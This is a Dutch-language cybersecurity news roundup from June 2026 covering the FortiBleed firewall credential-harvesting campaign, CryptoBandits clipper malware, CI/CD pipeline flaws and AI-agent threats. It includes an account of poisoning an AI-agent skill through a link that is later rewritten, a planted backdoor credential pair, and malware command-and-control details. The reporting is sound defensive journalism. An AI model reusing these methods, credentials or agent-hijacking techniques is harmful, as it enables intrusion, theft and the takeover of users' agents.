Een Russischtalige initial access broker, gedreven door financieel gewin, wordt verantwoordelijk geacht voor een grootschalige operatie gericht op het verzamelen van inloggegevens, bekend als FortiBleed. Deze campagne heeft wereldwijd meer dan 430.000 FortiGate firewalls getroffen. De operatie, die actief is sinds februari 2026, omvat het verzamelen van lijsten met inloggegevens, het zoeken naar blootgestelde diensten, het uitvoeren van brute-force aanvallen op toegankelijke systemen en het implementeren van op maat gemaakte sniffers op gecompromitteerde firewalls.

Volgens een recent rapport van SOCRadar vangen deze sniffers, eenmaal geïmplementeerd, zowel cleartext als gehashte inloggegevens op uit het verkeer dat door de getroffen apparaten stroomt. De aanvallers kraken, valideren en hergebruiken deze inloggegevens vervolgens tegen Active Directory-domeinen en andere blootgestelde diensten. Centraal in de operatie staat een tool gebaseerd op Golang, genaamd FortigateSniffer, die gebruikmaakt van het ingebouwde diagnostische commando `diagnose sniffer packet` van FortiOS om passief authenticatieverkeer van de geïnfecteerde apparaten te onderscheppen. Deze tool, beschikbaar in zowel Windows- als Unix-versies, is ontworpen om verkeer over 24 protocollen te monitoren, authenticatiegegevens te parsen en de inloggegevens te extraheren.

Er wordt vermoed dat de dreigingsactoren mogelijk de hulp hebben ingeschakeld van een open-source, AI-gestuurd offensief beveiligingsplatform genaamd CyberStrike, om bepaalde onderdelen van de workflow te ondersteunen. Opmerkelijk is dat een ander open-source framework, CyberStrikeAI, eerder dit jaar werd gebruikt in een afzonderlijke geautomatiseerde grootschalige scancampagne gericht op FortiGate-apparaten, zoals onthuld door Amazon Threat Intelligence.

De campagne richt zich sterk op kleine en middelgrote bedrijven (MKB) met minder dan 200 werknemers, aldus SOCRadar. De aanvallers richten zich op meerdere sectoren en regio's, met een opvallende nadruk op de Verenigde Staten en India. De IT-dienstensector lijkt een primair doelwit, waarschijnlijk om maximale downstream-toegang te verkrijgen, aangezien gecompromitteerde dienstverleners toegangspaden kunnen creëren naar klantomgevingen.

Een belangrijke bevinding is dat FortiBleed deel lijkt uit te maken van een bredere, initial access operatie gericht op meerdere leveranciers. Deze operatie is niet alleen gericht op Fortinet-apparaten, maar ook op het inbreken in Synology NAS, Sophos firewalls, RDWeb-portals, Citrix SSL VPN's en MS SQL-servers, waarbij sinds 28 februari 2026 geautomatiseerde brute-force technieken worden gebruikt.

In totaal hebben de aanvallers tussen 31 mei en 15 juni 2026 naar schatting ten minste 659 credential-harvesting pijplijnen gelanceerd, wat heeft geresulteerd in de identificatie van meer dan 110 miljoen inloggegevens. Dit omvatte 14,8 miljoen RADIUS (Remote Authentication Dial-In User Service) inloggegevens, 130.000 Kerberos-hashes en 89 miljoen MySQL-authenticatietokens.

De FortiBleed-campagne verloopt in vijf fasen:

1.  Uitvoeren van grootschalige verkenning met tools zoals Masscan en Shodan om kwetsbare, internetgerichte FortiGate firewalls te identificeren. Vervolgens worden een aangepast hulpprogramma genaamd FortiProbe-fast en GeoSplit gebruikt om FortiGate-systemen te filteren en per land te groeperen.

2.  Compromitteren van de apparaten met een credential checker genaamd "forticheck" die specifiek gericht is op het administratieve paneel en de SSL VPN-portal van FortiGate, samen met het gebruik van tools om administratieve SSH-toegang te verkrijgen via credential stuffing en dictionary attacks.

3.  Na het tot stand brengen van toegang via SSH, wordt FortigateSniffer geïmplementeerd om passief authenticatieverkeer over 24 protocollen (zoals TACACS+, Kerberos, RPC, SMB, LDAP, SMTP, FTP, Telnet, RDP, WinRM, MS SQL, MySQL, PostgreSQL en RADIUS) te onderscheppen met behulp van native FortiOS diagnostische commando's, waardoor cleartext inloggegevens en wachtwoordhashes kunnen worden verzameld.

4.  De wachtwoordhashes worden gekraakt met Hashmat en Hashtopolis, georkestreerd door een Telegram bots genaamd HASHBOT. Daarna worden ze gebruikt voor laterale beweging, Active Directory-enumeratie, Kerberos-validatie en SMB-authenticatie.

5.  Gevoelige gegevens van netwerkshares worden geëxfiltreerd, terwijl gestolen sessiecookies worden gebruikt om persistente, geauthenticeerde toegang te behouden.

SOCRadar merkt op dat niet alle doelwitten gelijk worden behandeld. In plaats daarvan worden doelwitten gerangschikt op economische waarde voordat exploitatiebronnen worden toegewezen. Bovendien omvat het sniffing-mechanisme een geofencing-filter dat operaties beperkt tot specifieke IP-bereiken en de activiteit beperkt tot tussen 7.00 en 18.00 uur Moskoutijd. Volgens een tijdlijn van gebeurtenissen, gedeeld door SpyCloud, begon de opvangcyclus gerelateerd aan FortiGate op 19 mei 2026, met de opzet van de hash-kraakinfrastructuur tegen het einde van die maand.

Het Braziliaanse cybersecuritybedrijf ZenoX meldt dat de operatie in cycli van 300 minuten (vijf uur) wordt uitgevoerd, met elke minuut een statusupdate. In elke cyclus wordt een regionale doellijst geladen en gevalideerd met 1.000 gelijktijdige threads, waarbij tellers voor succes, mislukking, timeout en waarschuwing worden weergegeven. In de eerste cycli lag het succespercentage rond de 90%. ZenoX vond ook dat bepaalde gebruikersnaam- en wachtwoordparen werden herhaald over duizenden verschillende IP-adressen, wat de mogelijkheid vergroot dat de accounts door de aanvaller zijn geplant als een clandestiene backdoor-toegangspunt. Acassio Silva, mede-oprichter en hoofd van threat intelligence bij ZenoX, verklaarde dat in het geval van de inloggegevens 'adminin:ITAdmin@888', deze op 3.947 verschillende apparaten aanwezig waren in het gevalideerde-inloggegevensbestand van de aanvaller, en op 1.562 apparaten binnen de EU-batch alleen.

 

Bron: Amazon | Bron 2: github.com | Bron 3: spycloud.com

24 juni 2026 | Beveiligingslek in AI-agent functionaliteiten omzeilt scans en bereikt duizenden

Beveiligingsbedrijf AIR heeft een significante kwetsbaarheid aangetoond in de manier waarop functionaliteiten (skills) voor AI-agenten worden gevalideerd. Het bedrijf ontwikkelde een nep-functionaliteit voor AI-agenten, plaatste deze via een populaire marktplaats voor functionaliteiten en promootte deze met een advertentie op Instagram. Volgens AIR bereikte de functionaliteit ongeveer 26.000 agenten, waaronder enkele die op zakelijke accounts actief waren.

Alle beveiligingsscanners die door AIR werden getest, keurden de functionaliteit goed en bestempelden deze als veilig. De payload was opzettelijk onschadelijk ontworpen en verzamelde alleen het e-mailadres van de gebruiker. Het hoofddoel van het experiment was aan te tonen dat geen van de gebruikelijke vertrouwenssignalen – zoals scanners, GitHub-sterren of een open source-reputatie – de kwaadaardige aard van de functionaliteit detecteerde.

Een functionaliteit is een bundel instructies die een AI-agent in zijn eigen context laadt en uitvoert, met ongeveer dezelfde autoriteit als een gebruikersprompt. Dit vertrouwen vormt de kern van het probleem en is de reden waarom tools voor het scannen van functionaliteiten überhaupt bestaan. De functionaliteit, genaamd "brand-landingpage", beweerde een landingspagina te kunnen bouwen met Google's Stitch-ontwerptool, specifiek gericht op niet-technische gebruikers.

Om de functionaliteit geloofwaardig te maken, richtte AIR zich op twee vertrouwenssignalen: GitHub-sterren en een positief scannerresultaat. Voor de sterren opende AIR een pull-aanvraag voor een repository van een marktplaats voor functionaliteiten met ongeveer 36.000 sterren en 156 functionaliteiten. De pull-aanvraag werd na enkele dagen samengevoegd, waardoor de nep-functionaliteit het hoge sterren-aantal van de repository erfde. Vervolgens plaatste AIR een advertentie op Instagram, gericht op marketeers, verkopers en ontwerpers, die de functionaliteit installeerden en in gebruik namen.

De scanners die AIR testte, waaronder die van Cisco, NVIDIA en de scanners die zijn geïntegreerd in skills.sh, analyseren alleen het aangeleverde pakket: de SKILL.md en de meegeleverde bestanden. De functionaliteit van AIR bevatte zelf geen directe installatie-instructies. In plaats daarvan gaf het de AI-agent de opdracht om de "Stitch SDK" te installeren door de documentatie te volgen op een externe link, stitch-design.ai, een domein dat door AIR wordt beheerd en niet door Google (de echte Stitch bevindt zich op stitch.withgoogle.com).

Aanvankelijk leidde de link naar de echte documentatie van Stitch, waardoor de scanners, die een schoon pakket zagen dat verwees naar een plausibele setup-pagina, de functionaliteit goedkeurden. De pagina die de agent daadwerkelijk zou ophalen en volgen, viel buiten de scan. Nadat de functionaliteit op grote schaal was geïnstalleerd, verving AIR de inhoud achter die link. De nieuwe versie instrueerde de agent om een script te downloaden en uit te voeren. In de demonstratie stuurde dit script alleen het e-mailadres van de gebruiker terug naar AIR, wat het bedrijf gebruikte om het aantal bereikte agenten te tellen. Een echte aanvaller had deze toegang kunnen gebruiken om bestanden te lezen, gegevens te verplaatsen of interne systemen aan te vallen, beperkt alleen door de toegang die de AI-agent had.

AIR is niet de eerste die dit aantoont. Drie weken eerder omzeilde Trail of Bits al de detector voor kwaadaardige functionaliteiten van ClawHub, de scanner van Cisco en alle drie de scanners die zijn gekoppeld aan skills.sh. De conclusie was duidelijk: een scanner controleert een vast pakket, terwijl een aanvaller de payload kan blijven aanpassen totdat deze de controle passeert. Echte campagnes gebruiken al maanden dezelfde truc, waarbij de ingediende functionaliteit schoon wordt gehouden en de payload wordt gehost op een site die de agent pas bij installatie ophaalt.

Het probleem is structureel: de scan vindt eenmalig plaats, maar de pagina waarnaar een functionaliteit de agent verwijst, kan op elk moment daarna worden herschreven. Anthropic's eigen documentatie waarschuwt al dat functionaliteiten die externe URL's ophalen riskant zijn om precies deze reden, aangezien de inhoud kan veranderen nadat de functionaliteit is gecontroleerd. Afzonderlijk onderzoek dit jaar toonde aan dat scanners vaak van mening verschillen, omdat elke scanner een functionaliteit geïsoleerd beoordeelt, zonder rekening te houden met de externe links en wat er na de beoordeling verandert.

Voor verdedigers is de boodschap duidelijk, nu met een scherper voorbeeld: behandel functionaliteiten als software, niet als tekst. Controleer waarnaar een functionaliteit verwijst, niet alleen wat er in het pakket zit. Veel van deze add-ons worden zonder gedegen controle geïnstalleerd, dus de eerste taak is om te achterhalen wat er al draait. Leid nieuwe functionaliteiten via een enkele, gecontroleerde bron en controleer ze opnieuw wanneer er iets verandert, want een schoon resultaat bij installatie blijft niet schoon als de functionaliteit contact maakt met een link die iemand anders kan bewerken. Pin versies vast, geef agenten minimale privileges en ga ervan uit dat elke externe instructie die een agent ophaalt, wordt uitgevoerd met de toegang van die agent.

De cijfers over de schaal van het bereik zijn afkomstig van AIR alleen en vereisen een sceptische lezing. Het bedrijf lanceert een beheerde marktplaats voor functionaliteiten en sluit de publicatie af met een pitch daarvoor. Het aantal van 26.000, het detail over zakelijke accounts en de bewering dat het volledige controle over elke agent had kunnen krijgen, zijn de eigen claims van het bedrijf en zijn niet onafhankelijk bevestigd. Wat wel standhoudt, is de methode. De genoemde scanners beoordelen inderdaad alleen het ingediende pakket, de blinde vlek voor externe links is reëel en onafhankelijk aangetoond, en de vertrouwenssignalen die AIR gebruikte – sterren en een schone scan – zijn precies die signalen die het ecosysteem nog steeds als bewijs van veiligheid behandelt. Het experiment legt niet zozeer een nieuwe bug bloot, maar toont de combinatie van alle zwakke vertrouwenssignalen rond functionaliteiten voor AI-agenten in één uitvoering: sterren die kunnen worden geleend, een scan die een momentopname leest en een link die na de controle kan worden herschreven. Of het werkelijke aantal nu 26.000 is of een fractie daarvan, de kwetsbaarheid die hiermee wordt blootgelegd, is er een die verdedigers nog steeds niet hebben gedicht.

 

Bron: AIR | Bron 2: github.com | Bron 3: blog.trailofbits.com

24 juni 2026 | AWS waarschuwt voor blinde vlekken in uitgaand cloudverkeer die data-exfiltratie mogelijk maken

Organisaties richten zich vaak op de beveiliging van de "voordeur" van hun cloudomgevingen, waarbij firewalls, toegangscontroles en webapplicatiefilters de meeste aandacht krijgen. Echter, wat de netwerken verlaat, is minstens zo cruciaal, en uitgaand verkeer wordt standaard vaak onvoldoende gecontroleerd. Dit creëert blinde vlekken die aanvallers kunnen misbruiken voor exfiltratie van data.

Wanneer een cloudwerkbelasting niet is voorzien van adequate uitgaande controles, kan deze ongemerkt een kanaal voor datadiefstal worden. Aanvallers die toegang krijgen tot een gecompromitteerde instantie, zullen vrijwel altijd proberen een uitgaande verbinding tot stand te brengen, hetzij om gevoelige bestanden te stelen, hetzij om een command-and-control (C2) link op te zetten. Deze kanalen blijven onopgemerkt als er geen monitoring plaatsvindt van het verkeer dat het netwerk verlaat.

Beveiligingsonderzoekers van AWS hebben deze groeiende blinde vlek geïdentificeerd en op 22 juni 2026 een gedetailleerd advies gepubliceerd. Hierin wordt benadrukt dat het risico van toepassing is op zowel traditionele cloudwerkbelastingen als de nieuwere generatie van door AI aangedreven systemen. Het rapport van AWS, gedeeld met Cyber Security News (CSN), wijst op gevallen waarin ongepatchte kwetsbaarheden, zoals CVE-2025-55182 (React2Shell), aanvallers in staat stelden code uit te voeren en onmiddellijk te beginnen met exfiltratie van data.

Het rapport belicht ook een nieuwer risico dat verbonden is met agentic AI-systemen. Volgens de OWASP Top 10 voor Agentic Applications kunnen bedreigingen zoals Agent GoalHijack en Unexpected Code Execution ertoe leiden dat AI-agenten gemanipuleerd worden om ongemerkt data buiten de organisatie te versturen. Deze agenten hebben vaak toegang tot tools, API's en code-interpreters, wat hen tot waardevolle doelwitten maakt. Beide scenario's delen een gemeenschappelijke factor: ongeautoriseerd uitgaand verkeer dat niet wordt gecontroleerd.

AWS stelt een gelaagde aanpak voor om deze lacune te dichten, waarbij het probleem tegelijkertijd op netwerkniveau, DNS-niveau en identiteits- en toegangsbeheerniveau wordt aangepakt. De kern van het probleem is dat de meeste cloudomgevingen uitgaand verkeer als routine beschouwen. Zonder gecentraliseerde inspectie kunnen data het netwerk verlaten via open poorten, gecodeerde DNS-queries of HTTPS-verbindingen die de inhoud verbergen. Aanvallers zijn zich hiervan bewust en gebruiken deze kanalen doelbewust.

DNS-tunneling is een van de subtielere methoden. Door data te coderen binnen DNS-queries, kunnen aanvallers traditionele inspectie van firewalls volledig omzeilen, aangezien DNS-verkeer essentieel is voor normale operaties en vaak wordt uitgesloten van diepgaande inspectieregels. AWS merkt op dat Route 53 Resolver DNS Firewall moet worden geïmplementeerd over VPC's om deze blinde vlek te dichten, omdat DNS-queries die worden afgehandeld door de VPC-resolver niet door standaard netwerkinspectiepaden gaan.

Een andere zorg is wat er gebeurt wanneer gestolen inloggegevens worden gebruikt om data naar externe opslag te kopiëren. Zonder beleid op endpointniveau dat beperkt welke opslagbuckets een werkbelasting kan benaderen, kan een gecompromitteerde identiteit gevoelige bestanden in enkele seconden naar een door aanvallers gecontroleerd account verplaatsen. Deze acties kunnen er zonder de juiste beveiligingsmaatregelen volledig normaal uitzien.

AWS schetst een gefaseerde strategie die organisaties kunnen volgen om hun verdediging op te bouwen zonder bestaande operaties te verstoren. De eerste stap is het inschakelen van DNS Firewall over VPC's en het activeren van dreigingsdetectie om onmiddellijk inzicht te krijgen in uitgaande verkeerspatronen. Van daaruit verschuift de focus naar fundamentele controles: het implementeren van organisatiebreed beleid dat beperkt welke identiteiten toegang kunnen krijgen, het opzetten van een gecentraliseerde netwerkfirewall om al het verkeer naar internet te inspecteren, en het toepassen van beleid voor endpoints dat beperkt welke externe bronnen werkbelastingen kunnen bereiken. Deze controles werken samen om zowel traditionele werkbelastingen als AI-agenten te voorkomen data te versturen naar ongewenste locaties.

De laatste fase omvat het automatiseren van de respons. Wanneer een verdachte bevinding naar boven komt, kunnen geautomatiseerde workflows in realtime de blokkeerlijsten van firewalls bijwerken, inloggegevens intrekken en beveiligingsteams waarschuwen voordat aanzienlijke schade optreedt. AWS adviseert alle bevindingen te centraliseren, zodat teams signalen over verschillende diensten kunnen correleren en sneller kunnen reageren. Dezelfde controles die een traditionele cloudserver beschermen, zijn ook van toepassing op AI-agenten. Een agent die binnen een cloudomgeving draait, volgt dezelfde netwerkpaden als elke andere werkbelasting en wordt geconfronteerd met dezelfde domeinfilters, DNS-regels en datatoegangsbeperkingen, mits deze controles correct zijn geïmplementeerd.

 

Bron: AWS

24 juni 2026 | 'Cordyceps' kwetsbaarheid in CI/CD-systemen bedreigt software supply chain

Een aanzienlijke kwetsbaarheid in de software supply chain, genaamd 'Cordyceps', is ontdekt binnen het open-source netwerk. Deze structurele fout stelt cybercriminelen in staat om build-pipelines te kapen en bedrijfsnetwerken te compromitteren. Beveiligingsonderzoeksbureau Novee, dat de kwetsbaarheid vernoemde naar een parasitaire schimmel, heeft de bevindingen gedeeld.

Volgens Novee is Cordyceps een systemische klasse van kwetsbaarheden in Continuous Integration en Continuous Deployment (CI/CD)-systemen, specifiek gelegen in workflows van GitHub Actions (.yml configuratiebestanden). Onderzoekers ontdekten dat een ongeauthenticeerde gebruiker geen speciale organisatierechten nodig heeft om een aanval uit te voeren. Een gratis, anoniem online account is voldoende om goedkeuringen te vervalsen, kwaadaardige code te injecteren of permanente inloggegevens te stelen.

Standaard geautomatiseerde scanners missen dit risico, omdat zij slechts individuele bestanden isoleren. Cordyceps vertrouwt daarentegen op exploit-ketens met meerdere stappen, waarbij onbetrouwbare data het systeem misleiden door een beveiligingsgrens te overschrijden. Bij een hypothetische aanval via command injection en artifact poisoning laat een ongeautoriseerde gebruiker een anonieme opmerking achter of dient een kwaadaardige code-update in, bekend als een pull-request. Een workflow met lage privileges behandelt deze invoer als een betrouwbaar commando, waardoor verborgen code wordt uitgevoerd die het uiteindelijke softwarepakket of artifact compromitteert.

Vervolgens treedt escalatie van privileges op wanneer die besmette data doorstroomt naar een workflow met hoge privileges en authenticatiesleutels op hoog niveau blootstelt. Dit hele proces kan een externe dreigingsactor in staat stellen om volledige administratieve rechten te verkrijgen over het cloudnetwerk van een bedrijf.

Novee scande ongeveer 30.000 open-source repositories met hoge impact, markeerde 654 projecten in één scan en verifieerde dat meer dan 300 volledig exploiteerbaar waren om het risico te testen. Het beveiligingsteam van Novee bevestigde de kwetsbaarheden ook in belangrijke infrastructurele systemen, wat bedrijven zoals Microsoft, Google, Apache, Cloudflare en de Python Software Foundation treft.

Een bevestigde bevinding binnen Microsoft Azure Sentinel toonde aan dat een anonieme opmerking bij een pull-request een aanvaller in staat kon stellen code uit te voeren en een niet-verlopende GitHub App-sleutel te stelen. Dit zou schrijftoegang verlenen tot beveiligingscontent die rechtstreeks naar klantwerkplekken wordt geïmplementeerd via de Azure Marketplace.

Op vergelijkbare wijze richtten onderzoekers zich op de sample-repository van Google’s AI Agent Development Kit (adk-samples), waar een enkele kwaadaardige pull-request volledige eigendomsrollen (roles/owner) over het bijbehorende Google Cloud-project kon verlenen. Verder onderzoek, zoals beschreven in de vandaag gepubliceerde blogpost van Novee, onthulde dat een aanvaller ook ongeautoriseerde commando's kon uitvoeren op de Workers SDK-toolchain van Cloudflare (met behulp van de Wrangler CLI-tool), opgeslagen inloggegevens kon stelen uit de Apache Doris-database en automatiseringstokens kon bemachtigen van Black, een populaire Python-codetool die maandelijks 130 miljoen downloads verwerkt. Alle geteste kwetsbaarheden zijn inmiddels gemeld en verholpen.

Onderzoekers merkten op dat dergelijke kwetsbaarheden snel toenemen, omdat AI-coderingstools configuratiebestanden exponentieel genereren, die consequent dezelfde onveilige structurele patronen reproduceren, waardoor de kwetsbaarheid zich vermenigvuldigt over miljoenen ongeteste repositories. Aangezien anonieme gebruikers deze gebrekkige pipelines kunnen exploiteren om grote bedrijfsplatforms zonder autorisatie te manipuleren, beschreven de onderzoekers het risico als "het besturen van de repositories van enkele van 's werelds grootste bedrijven, waarbij hun workflows geruisloos worden gemanipuleerd."

 

Bron: Novee

24 juni 2026 | Hackers onderschepten inlogverkeer van 24 protocollen via Fortinet firewalls

Hackers die tienduizenden Fortinet firewalls wisten te compromitteren, hebben op de geïnfecteerde apparaten het inlogverkeer van 24 verschillende protocollen onderschept. Hierdoor kregen zij gehashte en onversleutelde wachtwoorden in handen. Dit blijkt uit een nieuwe analyse van cybersecuritybedrijf SOCRadar. Eerder werd al bekend dat de inloggegevens van circa 74.000 Fortinet firewalls en VPN gateways te koop werden aangeboden op het darkweb.

Onderzoekers konden via een open directory diverse details over de operatie van de aanvallers achterhalen. SOCRadar stelt dat de aanval begon met bruteforce aanvallen via SSH. De aanvallers maakten hiervoor gebruik van een eigen lijst met inloggegevens, naar verluidt samengesteld uit data van eerdere datalekken en aangeschafte datasets.

Zodra de aanvallers toegang hadden tot een firewall, installeerden ze een netwerksniffer. Deze sniffer onderschepte passief het inlogverkeer van 24 verschillende protocollen, waaronder NetBIOS, SMB, LDAP, SMTP, POP3, IMAP, FTP, Telnet, RDP, Radius en FortiClient. Op deze manier bemachtigden de aanvallers zowel gehashte als onversleutelde wachtwoorden, aangezien sommige van deze protocollen inloggegevens onversleuteld versturen.

De onderschepte wachtwoordhashes werden vervolgens gekraakt met behulp van een gedistribueerd GPU cluster. Met de gekraakte wachtwoorden probeerden de aanvallers lateraal te bewegen binnen de netwerken, met als doel toegang te krijgen tot systemen zoals Active Directory en MSSQL databases. Het uiteindelijke doel van deze operatie is volgens de onderzoekers het stelen van gevoelige data van netwerkschijven en het behouden van toegang tot de gecompromitteerde omgevingen door middel van gestolen session cookies.

 

Bron: socradar.io

24 juni 2026 | Agentic AI transformeert cyberaanvallen met autonome capaciteiten

De evolutie van kunstmatige intelligentie (AI) markeert een significante verschuiving in het landschap van cyberaanvallen, waarbij wapens niet langer een constante menselijke bediening vereisen. Waar AI voorheen functioneerde als een assistent voor het opstellen van phishing-emails, het voorstellen van exploits of het schetsen van kwaadaardige functies, neemt 'agentic AI' nu de rol van de uitvoerder over. Deze geavanceerde systemen met AI kunnen zelfstandig doelen identificeren en de benodigde stappen uitvoeren om een aanval te voltooien, zonder menselijke tussenkomst. Deze ontwikkeling versnelt offensieve operaties en verlaagt de drempel voor potentiële aanvallers aanzienlijk.

Voor aanvallers met beperkte technische vaardigheden biedt agentic AI ongekende mogelijkheden. Voorheen waren deze 'script kiddies' beperkt door hun eigen expertise, maar nu kunnen zij agents inzetten om exploits te ontwikkelen en complete campagnes autonoom uit te voeren. Dit fenomeen, ook wel 'script kiddie as a service' genoemd, betekent dat geavanceerde aanvallen nu afkomstig kunnen zijn van ongeschoolde actoren. De beperkingen van deze aanvallers worden nu bepaald door de capaciteiten van de modellen met AI die zij gebruiken, niet langer door hun eigen kennis. Dit leidt tot een gedragsmatige monocultuur, waarbij veel ongetrainde aanvallers vergelijkbare modellen op vergelijkbare manieren inzetten, wat resulteert in herkenbare patronen zoals gestandaardiseerde phishing en exploitketens. Dit biedt verdedigers de mogelijkheid om wijdverspreide dreigingen beter te anticiperen en te mitigeren.

Voor ervaren cybercriminelen en geautoriseerde offensieve operaties verbetert kunstmatige intelligentie niet noodzakelijkerwijs de vaardigheden, maar verhoogt het de operationele snelheid drastisch. Door een agent te trainen op bestaande methoden, kunnen campagnes parallel worden uitgevoerd, waardoor taken die voorheen weken in beslag namen, nu in enkele uren voltooid kunnen worden. Dit tweeledige effect – meer aanvallers op instapniveau en versnelde aanvallen van experts – verbreedt het algehele dreigingslandschap aanzienlijk.

Een veelvoorkomend voorbeeld is autonome social engineering. Hierbij verzamelt een agent met AI publiekelijk beschikbare informatie over een doelwit, zoals LinkedIn-profielen, persberichten of opnames van conferenties, om een gedetailleerd profiel op te bouwen. Een tweede agent gebruikt deze intelligentie vervolgens om gepersonaliseerde berichten te genereren en te versturen, reacties te beheren en een doorlopend gesprek te voeren, waarbij het doel stapsgewijs wordt benaderd zonder menselijke communicatie.

Het gevaar hiervan ligt niet alleen in de snelheid, maar ook in het verdwijnen van traditionele verdedigingssignalen. Phishing-verdedigingen waren jarenlang gebaseerd op tekenen van massaproductie, zoals onhandige grammatica, hergebruikte sjablonen en identieke mails. Agentic AI elimineert deze signalen door vloeiende, unieke en op waarheid gebaseerde berichten te creëren. Dit dwingt verdedigers om zwaarder te leunen op infrastructuursignalen, zoals reputatie van de afzender en authenticatie.

Deze automatisering strekt zich ook uit tot exploitatie. Naarmate modellen met AI bedrevener worden in het koppelen van aanroepen van tools en het zelf corrigeren in een live omgeving, daalt de drempel voor het produceren van een werkende exploit. De Amerikaanse federale overheid heeft zelfs al ingegrepen door modellen zoals Anthropic's Fable 5 van de markt te halen vanwege zorgen over de capaciteiten. Door modellen met AI te koppelen aan databases met bekende kwetsbaarheden, kunnen ze zelfstandig verkenning uitvoeren, inschatten waaraan een doelwit mogelijk is blootgesteld, de juiste exploit selecteren en rapporteren dat deze waarschijnlijk zal werken.

 

Bron: SANS Technology Institute

24 juni 2026 | Nieuwe CryptoBandits malware steelt cryptocurrency via USB-schijven en Tor

Microsoft Threat Intelligence en Microsoft Defender Experts hebben een nieuwe, op Windows gebaseerde cryptocurrency clipper ontdekt, genaamd CryptoBandits (gedetecteerd als Trojan:Win32/CryptoBandits.A), die vermoedelijk sinds februari 2026 actief is. Deze malware monitort het klembord van computers om financiële gegevens te stelen en aanvallers op afstand controle te geven over geïnfecteerde systemen.

De verspreiding van de malware gebeurt via een programma met twee componenten: een wormcomponent voor verspreiding en een stealercomponent voor het richten op financiële gegevens. De initiële infectie vindt plaats via USB-flashschijven die kwaadaardige shortcut (.lnk) bestanden bevatten. Wanneer een gebruiker op zo'n shortcut klikt, wordt in plaats van een document een verborgen worm gestart.

Deze worm verbergt de originele bestanden op de USB-schijf en creëert overeenkomstige kwaadaardige shortcuts om meer gebruikers te misleiden. Om detectie te omzeilen, configureert de malware uitsluitingen voor Windows Defender, zodat de setup-mappen niet worden gescand. Vervolgens plaatst het zijn hoofdbestanden, waaronder twee verborgen JavaScript-bestanden, in een map onder `C:\Users\Public\Documents`. Tot slot stelt het automatische achtergrondtaken in om continu te blijven draaien en elke nieuwe USB-schijf die op de computer wordt aangesloten, te infecteren.

Een opvallende bevinding is dat de clippercomponent niet afhankelijk is van traditionele installers. Het maakt gebruik van standaard ingebouwde Windows scripttools, zoals WScript en ActiveXObject, om rechtstreeks met het besturingssysteem te communiceren. Dit stelt de malware in staat om stil in het computergeheugen te draaien en het klembord elke 500 milliseconden te scannen op privé cryptocurrency sleutels en 12- of 24-woordige backup seed phrases. Zodra een gebruiker een crypto-walletadres kopieert, wordt dit vervangen door het adres van de aanvaller.

Onderzoekers merkten op dat het omwisselsysteem van de malware zich richt op specifieke walletformaten:

*   Monero (beginnend met 4 of 8): wordt vervangen door een enkel vast adres.

*   Tron (beginnend met T): wordt vervangen door een adres dat overeenkomt met de eerste twee karakters.

*   Bitcoin Taproot (beginnend met bc1p) en Bech32 (beginnend met bc1q): worden vervangen door een adres dat overeenkomt met het laatste karakter.

*   Bitcoin Legacy (beginnend met 1) en P2SH (beginnend met 3): worden vervangen door een adres dat overeenkomt met de eerste twee karakters.

Het programma maakt ook vijf screenshots, met een interval van tien seconden, zodat de aanvallers de wallet-saldi van het slachtoffer kunnen bekijken.

Om detectie te ontwijken, sluit de clipper zichzelf af als Taakbeheer (`taskmgr.exe`) actief is. Het bundelt een ingebouwde privacytool Tor (`ugate.exe`) voor netwerkcommunicatie en gebruikt een lokaal IP-adres (127.0.0.1) op poort 9050 voor het routeren van verkeer. Dit mechanisme helpt de malware zijn uiteindelijke bestemming te verbergen. Een tool genaamd `curl` wordt gebruikt om gegevens naar een `.onion` website te verzenden. De onderzoekers legden uit dat de gebundelde Tor-client centraal staat in de operatie, omdat deze de DNS-zichtbaarheid vermindert, de uiteindelijke C2 bestemming verbergt en het blokkeren op basis van bestemming bemoeilijkt, wat de operator anonimiteit verschaft.

De gegevens worden verzonden via drie specifieke eindpunten: `/route.php` voor het ontvangen van commando's, `/recvf.php` voor het uploaden van screenshots en `/stub.php` voor het downloaden van bestanden. Een EVAL-commando van de server voert nieuwe code uit die verborgen is in een lokaal bestand genaamd `cfile`, waardoor aanvallers permanente afstandsbediening krijgen.

Ter bescherming van systemen adviseert Microsoft om AutoPlay voor verwisselbare media uit te schakelen, de uitvoering van .lnk bestanden vanaf USB-schijven te blokkeren en walletadressen zorgvuldig te controleren voordat transacties worden uitgevoerd.

 

Bron: Microsoft

24 juni 2026 | Verwachte evolutie van iGaming fraude: wat security teams moeten weten

De iGaming industrie blijft een aantrekkelijk doelwit voor fraudeurs, gekenmerkt door een hoog volume aan transacties, wereldwijde gebruikers, snelle betalingen en de snelle adoptie van nieuwe technologieën. Hierdoor zijn cybercriminelen voortdurend op zoek naar zwakke plekken. In de afgelopen jaren is de verfijning van frauduleuze activiteiten aanzienlijk toegenomen; waar voorheen banken en bonusmisbruik de primaire focus waren, wordt nu kunstmatige intelligentie (AI) ingezet voor geavanceerdere aanvallen.

Tegen 2027 moeten security teams zich voorbereiden op een dreigingslandschap dat meer geautomatiseerd, schaalbaar en moeilijker te detecteren zal zijn dan ooit tevoren. Inzicht in de richting van fraude is essentieel om bedrijven en hun klanten te beschermen. De toenemende complexiteit van fraude wordt mede mogelijk gemaakt door de vooruitgang en beschikbaarheid van technologie, met AI als een cruciaal hulpmiddel. AI stelt criminelen in staat om met minder technische bekwaamheid schaduwidentiteiten te creëren of complexe, geprogrammeerde aanvallen uit te voeren. Deze tools vervangen of verbeteren menselijke capaciteiten, waardoor traditionele controles minder effectief worden.

Naarmate online gokplatforms nieuwe markten betreden, introduceren ze diverse wetten en variaties in verificatievereisten. Dit maakt het voor cybercriminelen eenvoudiger om mazen in operationele processen te vinden en te exploiteren. Tegelijkertijd kan de inzet van AI door gevestigde spelers in verschillende industrieën ook een risico vormen voor financiële fraude. Deze ontwikkelingen veranderen de aard van criminele activiteiten, waarbij traditionele garanties voor financiële transacties vrijwel verdwenen zijn. Analisten wijzen op de online gaming omgeving als bijzonder gunstig voor criminele elementen die zich bezighouden met witwassen en verduistering.

Vier belangrijke fraudetrends worden verwacht tegen 2027:

1.  **Door AI gegenereerde synthetische identiteiten**: In plaats van gestolen persoonlijke identificeerbare informatie (PII) te gebruiken, combineren deze accounts echte en kunstmatige data. AI tools kunnen snel realistische documenten, selfies en andere informatie creëren, waardoor valse accounts basiscontroles passeren en lang actief blijven voor bonusmisbruik, witwassen of betalingsfraude. Security- en fraudeteams zullen robuuste protocollen nodig hebben, zoals biometrische verificatie, cognitieve gedragsanalyse en documentvalidatie.

